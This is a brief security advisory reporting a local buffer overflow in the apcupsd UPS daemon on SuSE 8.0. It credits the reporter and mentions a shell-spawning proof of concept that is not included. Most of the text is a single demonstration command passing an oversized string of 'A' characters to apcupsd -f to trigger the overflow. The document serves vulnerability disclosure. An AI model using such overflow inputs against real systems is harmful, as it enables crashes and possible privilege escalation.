COMMAND

    apcupsd local buffer overflow

SYSTEMS AFFECTED

    Tested with the apcupsd delivered with SuSE 8.0

PROBLEM

    Thanks to Serkan Akpolat [sakpolat@gmx.net] advisory:

    Apcupsd is a daemon for most APC UPSs for Linux. There is no bounds
    checking in the source code, so overflowing the buffer is possible.
    Apcupsd is by default not setuid root (SuSE 8.0). A proof of concept
    shell spawning exploit is attached to mail.

    milkshake:~ # apcupsd -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA